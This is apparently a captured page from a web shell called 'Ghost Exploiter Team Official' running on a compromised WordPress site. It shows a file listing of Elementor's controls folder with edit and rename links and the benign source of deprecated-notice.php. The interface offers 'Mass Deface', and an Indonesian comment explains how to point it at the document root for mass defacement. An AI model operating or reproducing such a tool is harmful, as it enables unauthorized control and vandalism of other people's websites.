webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
public_html11
/
wp-content
/
plugins
/
elementor
/
includes
/
controls
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
groups
--
ren
alert.php
1.795KB
edt
ren
animation.php
4.756KB
edt
ren
base-data.php
3.66KB
edt
ren
base-icon-font.php
0.613KB
edt
ren
base-multiple.php
2.03KB
edt
ren
base-ui.php
0.504KB
edt
ren
base-units.php
3.495KB
edt
ren
base.php
3.08KB
edt
ren
box-shadow.php
3.393KB
edt
ren
button.php
1.678KB
edt
ren
choose.php
2.214KB
edt
ren
code.php
1.99KB
edt
ren
color.php
2.035KB
edt
ren
date-time.php
2.036KB
edt
ren
deprecated-notice.php
2.273KB
edt
ren
dimensions.php
4.938KB
edt
ren
divider.php
0.81KB
edt
ren
exit-animation.php
2.542KB
edt
ren
font.php
2.216KB
edt
ren
gallery.php
5.151KB
edt
ren
gaps.php
1.619KB
edt
ren
heading.php
1.316KB
edt
ren
hidden.php
0.926KB
edt
ren
hover-animation.php
4.321KB
edt
ren
icon.php
31.325KB
edt
ren
icons.php
7.665KB
edt
ren
image-dimensions.php
3.708KB
edt
ren
media.php
12.818KB
edt
ren
notice.php
4.071KB
edt
ren
number.php
2.089KB
edt
ren
popover-toggle.php
2.664KB
edt
ren
raw-html.php
1.483KB
edt
ren
repeater.php
4.942KB
edt
ren
section.php
1.318KB
edt
ren
select.php
2.563KB
edt
ren
select2.php
2.716KB
edt
ren
slider.php
3.488KB
edt
ren
structure.php
2.462KB
edt
ren
switcher.php
2.076KB
edt
ren
tab.php
1.006KB
edt
ren
tabs.php
0.922KB
edt
ren
text-shadow.php
3.133KB
edt
ren
text.php
2.104KB
edt
ren
textarea.php
2.006KB
edt
ren
url.php
5.09KB
edt
ren
wp-widget.php
1.346KB
edt
ren
wysiwyg.php
1.734KB
edt
ren
<?php namespace Elementor; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Elementor Deprecated Notice control. * * A base control specific for creating Deprecation Notices control. * Displays a warning notice in the panel. * * @since 2.6.0 */ class Control_Deprecated_Notice extends Base_UI_Control { /** * Get deprecated-notice control type. * * Retrieve the control type, in this case `deprecated_notice`. * * @since 2.6.0 * @access public * * @return string Control type. */ public function get_type() { return 'deprecated_notice'; } /** * Render deprecated notice control output in the editor. * * Used to generate the control HTML in the editor using Underscore JS * template. The variables for the class are available using `data` JS * object. * * @since 2.6.0 * @access public */ public function content_template() { ?> <# if ( data.label ) { #> <span class="elementor-control-title">{{{ data.label }}}</span> <# } let notice = wp.i18n.sprintf( wp.i18n.__( 'The <strong>%1$s</strong> widget has been deprecated since %2$s %3$s.', 'elementor' ), data.widget, data.plugin, data.since ); if ( data.replacement ) { notice += '<br>' + wp.i18n.sprintf( wp.i18n.__( 'It has been replaced by <strong>%1$s</strong>.', 'elementor' ), data.replacement ); } if ( data.last ) { notice += '<br>' + wp.i18n.sprintf( wp.i18n.__( 'Note that %1$s will be completely removed once %2$s %3$s is released.', 'elementor' ), data.widget, data.plugin, data.last ); } #> <div class="elementor-control-deprecated-notice elementor-panel-alert elementor-panel-alert-warning">{{{ notice }}}</div> <?php } /** * Get deprecated-notice control default settings. * * Retrieve the default settings of the deprecated notice control. Used to return the * default settings while initializing the deprecated notice control. * * @since 2.6.0 * @access protected * * @return array Control default settings. */ protected function get_default_settings() { return [ 'widget' => '', // Widgets name 'since' => '', // Plugin version widget was deprecated 'last' => '', // Plugin version in which the widget will be removed 'plugin' => '', // Plugin's title 'replacement' => '', // Widget replacement ]; } }